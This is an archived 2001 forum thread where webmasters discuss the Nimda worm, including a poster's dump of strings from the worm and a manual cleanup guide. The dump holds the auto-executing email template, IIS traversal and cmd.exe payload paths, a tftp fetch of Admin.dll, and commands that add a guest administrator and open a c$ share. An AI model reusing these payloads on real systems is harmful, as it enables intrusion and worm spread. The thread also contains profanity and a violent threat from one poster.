I just recieved a virus that will try to auto download/run when you open the email.

I dont know much about it yet and havent seen any reports about it anywhere but i just recieved it 5 mins ago. It appears to create a new Guest user on the infected box then add some network changes in the registry.

It also will take control of IIS then start transmitting emails based on the template below which may help you to filter the filenames.

Anything you recieve with readme(*).exe should be deleted immeaditly!!

Subject: From: < DATA
RCPT TO: < >
MAIL FROM: < HELO aabbcc -dontrunold NULL \readme*.exe admin.dll qusery9bnow -qusery9bnow \mmc.exe \riched20.dll boot Shell explorer.exe load.exe -dontrunold \system.ini \load.exe \\ octet


According to some tags inside the source its called.. Concept Virus(CV) V.5, Copyright(C)2001 R.P.China MIME-Version: 1.0

Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

Received: from PCAJ (213.237.104.88.adsl.hvi.worldonline.dk [213.237.104.88])
Return-Path: <info@notonlywine.com>

You may find this useful:

http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0109&L=ntbugtraq&F=P&S=&P=1747

Some hosts are down because of this.

The fbi just said somthing about a new virus

Well seem to be one of the first to get it lucky i have everything disabled so it cant do shit to me. http://bbs.adultwebmasterinfo.com/ubb/wink.gif

Apparently this thing even changes the settings in Bind and Networking prefs all via registry hacks so NT and Win2k users could be at greatest risk. Its pretty slick code compaired to Code Red which was kinda sloppy and more based on the code of the Mellinium Worm.

Only prob if word dont spread fast well have the same shit as before and i dont think the FBI has time to worry about this shit right now. Best thing is if everyone who reads this just pass the word around to their hosts and friends ASAP.

Fuck! this site is propagating the VIRUS!!
SOMEONE CALL THE FBI !!

http://204.134.115.5/ LOL

some guy just entered a chat room and spamed it few times then left...

now i'm fucked..

BE WARE - it will run automaticly a EXE file called readme.exe and will try to conect to the net... lucky i have ZoneAlarm that alerted me of this file trying to call home or something...

DO NOT LOAD THAT PAGE IF YOU HAVE OUTLOOK INSTALLED -

FUCK MICROSOFT!!

I received two of those emails. I had no idea what they were, but when I pressed cancel when prompted to open or save, Outlook crashed. http://bbs.adultwebmasterinfo.com/ubb/frown.gif I had a hard time deleting them. I hope the FBI catch these people and put them in jail for a very long time. I'm sick of this garbage.

Is it possible to stop Outlook from handling the attachment when you select the email?

<font face="Verdana, Arial" size="2">Originally posted by trip:
Fuck! this site is propagating the VIRUS!!
SOMEONE CALL THE FBI !!

http://204.134.115.5/ LOL

some guy just entered a chat room and spamed it few times then left...

now i'm fucked..

BE WARE - it will run automaticly a EXE file called readme.exe and will try to conect to the net... lucky i have ZoneAlarm that alerted me of this file trying to call home or something...

DO NOT LOAD THAT PAGE IF YOU HAVE OUTLOOK INSTALLED -

FUCK MICROSOFT!!</font>

Uhm dude, WTF!!!!!! What do you mean? That page loads a virus or what??? First you give a link and then you say dont click it. Well ofcourse i clicked before i read on. A wav file popped up???

<font face="Verdana, Arial" size="2">Originally posted by shunga:
Is it possible to stop Outlook from handling the attachment when you select the email?</font>

good question

I have outlook set to delete anything on server that is bigger then 100kb. How big is the file?

Shane

Goddamnit, im infected by the virus!!!!
What asshole posts a link to a virus on a message board! Geesh, somebody kick this guy's nuts!!!!

damn shit I've visited a mp3 site and now I'm now infected..

I've bought the lastest version of mcafee to desinfect my comp, but actually they didn't find a solution to cleanup the infected file ..

my infected files:
c:\\windows\system\load.exe
c:\\windows\system\riched20.dll
and all the page from the mp3 site
stored in the
c:\\windows\Temporary.Internet Files\content.IE5

anyone know if it's dangerous to delete load.exe and riched20.dll? I don't want to crash my Window.

Guys, Linux is waiting for you !!!

long live netscape http://bbs.adultwebmasterinfo.com/ubb/eek.gif

Like I have said a thousand times.. run Linux / UNIX

All my sites are up! =)

i'm glad i didnt click that link!!!!!!!!

<font face="Verdana, Arial" size="2">Originally posted by shane94:
I have outlook set to delete anything on server that is bigger then 100kb. How big is the file?

Shane</font>

79,000 bytes.

Anyone know how to decode something base64-encoded? I'm curious to learn how this shit works.

I'm infected as hell with it right now and it keeps sending out emails to people that arent even in my address book.

this is fucked up

Two of our machines were infected by this shit virus. It will spread like wildfire. Just wipe your machine out and reinstall everything. Hopefully yo have everything backed up : )) We had something like 2000 files infected. Get Norton Antivirus 2001 and protect your email. Make sure you set your security for Active X on prompt.

Now if I ever catch this fuckin loser who invented this virus, I'll personally cut his nuts and dick off and shove them up his ass.
What kind of a loser this person must be.

Oh one more thing, there was some cocksucker who planted a backdoor virus on me sometime ago and I have a good idea on who it is, so basically be warned that if our paths cross in the future, be ready to pick your teeth off the floor. Have a good day.

Unfortunately, I visited this fucked-up website, too but I restarted the windows while downloading so that worked..
I know it is not the best way but well, at least it works http://bbs.adultwebmasterinfo.com/ubb/smile.gif

Arthur i already have most of the code that does the damage however i dont think a anti-virus update will be ready anytime soon. Its all in Microsux hands this time because their shit patches obviously were proven worthless.

To pervent infection outlook uses IE setings which if you have VB and Active files set to prompt you would be safe.. This thing uses code like the Active Dialers but a little slicker to plant itself on your system.

The fix would be fairly complex due to network and IIS settings involved and may even require format by most users.

Here is some of the code to help you figure out what it has done so advanced users can reverse the damage however you screw up your system dont bitch at me.. You can also give some of this info to your hosts so they can add this to their mail filters.

If your host wont filter this shit then find a new host because they are just adding to the problem and its not very hard to filter the shit when all the required info is right here for everyone.

Im not gonna post all the data used because its not needed for anything but to deploy the commands and could be abused in many ways and i know some of you will do just that to get traffic. http://bbs.adultwebmasterinfo.com/ubb/frown.gif


System\CurrentControlSet\Services\VxD\MSTCP NameServer SYSTEM\CurrentControlSet\Services\Tcpip\Parameters \Interfaces\ SYSTEM\CurrentControlSet\Services\Tcpip\Parameters \Interfaces Concept Virus(CV) V.5, Copyright(C)2001 R.P.China MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


&lt;HTML&gt;&lt;HEAD&gt;&lt;/HEAD&gt;&lt;BODY bgColor=3D#ffffff&gt;
&lt;iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0&gt;
&lt;/iframe&gt;&lt;/BODY&gt;&lt;/HTML&gt;
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: &lt;EA4DMGBP9p&gt;



--====_ABC1234567890DEF_====

NUL=

[rename]
\wininit.ini C:\ Personal Software\Microsoft\Windows\CurrentVersion\Explorer \Shell Folders \ .. \*.*  € €EXPLORER fsdhqherwqi2001 SYSTEM\CurrentControlSet\Services\lanmanserver\Sha res\Security share c$=c:\ user guest "" localgroup Administrators guest /add localgroup Guests guest /add user guest /active open user guest /add net HideFileExt ShowSuperHidden Hidden Software\Microsoft\Windows\CurrentVersion\Explorer \Advanced

Process Counter 009 software\microsoft\windows nt\currentversion\perflib\009 Counters Version Last Counter software\microsoft\windows nt\currentversion\perflib /scripts /MSADC /c /d /scripts/..%255c.. /_vti_bin/..%255c../..%255c../..%255c.. /_mem_bin/..%255c../..%255c../..%255c.. /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.. /scripts/..%c1%1c.. /scripts/..%c0%2f.. /scripts/..%c0%af.. /scripts/..%c1%9c.. /scripts/..%%35%63.. /scripts/..%%35c.. /scripts/..%25%35%63.. /scripts/..%252f.. /root.exe?/c+ /winnt/system32/cmd.exe?/c+ net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest" tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20 Admin.dll c:\Admin.dll d:\Admin.dll e:\Admin.dll
&lt;html&gt;&lt;script language="JavaScript"&gt;window.open("readme.eml", null, "resizable=no,top=6000,left=6000")&lt;/script&gt;&lt;/html&gt; /Admin.dll dir GET %s HTTP/1.0
Host: www
Connnection: close

c: readme main index default html .asp .htm \readme.eml .exe mep winzip32.exe riched20.dll .nws .eml .doc .exe dontrunold ioctlsocket gethostbyname gethostname inet_ntoa inet_addr ntohl htonl ntohs htons closesocket select sendto send recvfrom recv bind connect socket __WSAFDIsSet WSACleanup WSAStartup ws2_32.dll MAPILogoff MAPISendMail MAPIFreeBuffer MAPIReadMail MAPIFindNext MAPIResolveName MAPILogon MAPI32.DLL WNetAddConnection2A WNetCancelConnection2A WNetOpenEnumA WNetEnumResourceA WNetCloseEnum MPR.DLL ShellExecuteA SHELL32.DLL RegisterServiceProcess VirtualFreeEx VirtualQueryEx VirtualAllocEx VirtualProtectEx CreateRemoteThread HeapCompact HeapFree HeapAlloc HeapDestroy HeapCreate KERNEL32.DLL SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths Type Remark X:\ SOFTWARE\Microsoft\Windows\CurrentVersion\Network\ LanMan\X$ Parm2enc Parm1enc Flags Path SOFTWARE\Microsoft\Windows\CurrentVersion\Network\ LanMan\ SOFTWARE\Microsoft\Windows\CurrentVersion\Network\ LanMan SYSTEM\CurrentControlSet\Services\lanmanserver\Sha res
Cache Software\Microsoft\Windows\CurrentVersion\Explorer \MapMail QUIT
.
Subject: From: &lt; DATA
RCPT TO: &lt; &gt;
MAIL FROM: &lt; HELO aabbcc -dontrunold NULL \readme*.exe admin.dll qusery9bnow -qusery9bnow \mmc.exe \riched20.dll boot Shell explorer.exe load.exe -dontrunold \system.ini \load.exe \\ octet

I tell you guys what if you have mIRC or use any form of IRC client you can connect to irc.dal.net and go to channel #nohack these guys should have a fix real soon and they are great people who work non for profit on this kinda thing.

Im gonna send them the file if they dont have it already and also you can go to www.nohack.net (http://www.nohack.net) or http://www.infowar.com for lots of useful info relaed to the latest exploits.

Dont format your PC as of yet if you are infected give me till tomorrow evening to see if we cant get a fix or at the very least cripple the dam thing untill a fix is available.

Just to show the LOVE that comes from the USA and how us Americans take their time to help others in all times of need!!

Ok i asked UncaHeLL from Dalnets #nohack to join us on this issue if he saves your machine you better make good for him he says he will work on a fix.

Maybe some small donations i think would be a nice gesture since these guys do this on their time just to because they are nice caring folks.

Hello all,
I obtained copies of the new Nimda Worm today and it appears it is also infecting security patched IIS webservers and Internet Explorer version 5.5. General tip here use Netscape or Opera to view suspect sites and disable java and active-x in Internet Explorer and run the MS critical Updates often.

On analysis it creates a few different files and has a few different infection methods. Lets forget the infection methods and get on with the quick clean up and back to normality. http://bbs.adultwebmasterinfo.com/ubb/wink.gif

OK first off if you have become infected we need to kill the process that is running and stop it from restarting again.

If you visit www.lockdowncorp.com (http://www.lockdowncorp.com) and dload lockdown millennium and install it we have the beginning of a cleanup.

You may need to reboot if the worm has consumed all your resources.

OK with LockDown installed double click on the yellow lock in your system tray and when LockDown appears on your screen click on the GENERICS button and you will see your start up programs.

If you are running Win2k or NT look for Mmc.exe in the list and remove from startup and you will see a startup for SYSTEM.INI which also needs removing. Next click on the tab that says LIST SERVERS and kill Mmc.exe.

If you are running Win95/98 look for Load.exe in the list and remove from startup and you will see a startup for SYSTEM.INI which also needs removing. Next click on the tab that says LIST SERVERS and kill Load.exe.

Now with all versions of Windows you may see Mep****.TMP.exe running, this must also be killed.

Now for the fun part :

First of all make sure you can view hidden and system files. To enable this go to Start, Settings and Folder Options and then click on View Tab. For NT users do Tools, Folder Options from inside an Explorer window.
Once in there check Show Hidden Files and Folders and then Uncheck hide extensions for know file types.

When finished click apply and exit that window.

Now go to Start, Find, Files and Folders.

Search for and delete any of the following files that you find if you are infected. If you find just mmc.exe or riched20.dll you may not be infected.

load.exe
mmc.exe
riched20.dll
readme.eml
readme.exe

Go into Windows and Temp and click on 1 file and hold down CTRL and click A. This will select all files. Now delete the contents of the temporary folder including read only files. You dont need any of these files anyway.

Nimda infects *.html, *.htm and *.asp docs as well so look for this line in any of these docs.
html&gt;&lt;script language="JavaScript"&gt;window.open("readme.eml", null, "resizable=no,top=6000,left=6000")&lt;/script&gt;&lt;/html&gt;

and remove it or if the webserver you are using is not infected dload clean backups from the server.

Finishing up http://bbs.adultwebmasterinfo.com/ubb/smile.gif

Now click on Shares in lockdown and you will be asked whether to start in advanced mode or not. Say yes restart, in advanced mode. If Nimda spawned fileshares on your computer you are going to get unpassworded shares warnings. This means you have hidden C$, D$ shares etc and the shares need disabling or unsharing. With open shares anyone has access to any files on your drive and you are also open to secondary infections. Network computers will also possibly be infected so unplug them from the network until you have cleaned them to prevent them reinfecting the ones you have just cleaned.

MMC.EXE and RICHED20.DLL are both legitimate Windows files and need replacing with clean copies. Without Riched20.dll most text items will not open. Be sure these are clean files from trusted sites or sources.

Finally scan the system with LockDown for secondary infections from possibly having open fileshares.

Once you have done this you should be back in business and no longer spreading. I would advise closing IIS Service if you really do not need to use it until a proper fix is made available. New Updated File signatures for LockDown will be available by 1 PM EST Today so update the file sigs and scan every drive for remnants.

All the Best

Now make sure you know what you are doing or find someone to help you if you dont..!


Thanks to virushelp for takin his time to register and post this info much appreaciated. http://bbs.adultwebmasterinfo.com/ubb/smile.gif

Forgot to mention Admin.dll is also overwritten on Win2k/NT machines and must be replaced.

Its 2am and Im tired http://bbs.adultwebmasterinfo.com/ubb/frown.gif So forgive the lapse of memory. Ive been working with this damn worm all day infecting different platforms to watch its behaviour and check what files it creates to be able to effect removal.

All the Best

If I just install the patch for Internet Explorer... I will never get the virus on the web?

or I must disable active-x?

I had both javascript and activex disabled when I checked the link, and it didn't bite me.
Was also safe using Opera browser, which actually let me to harmelssly download the encoded virus.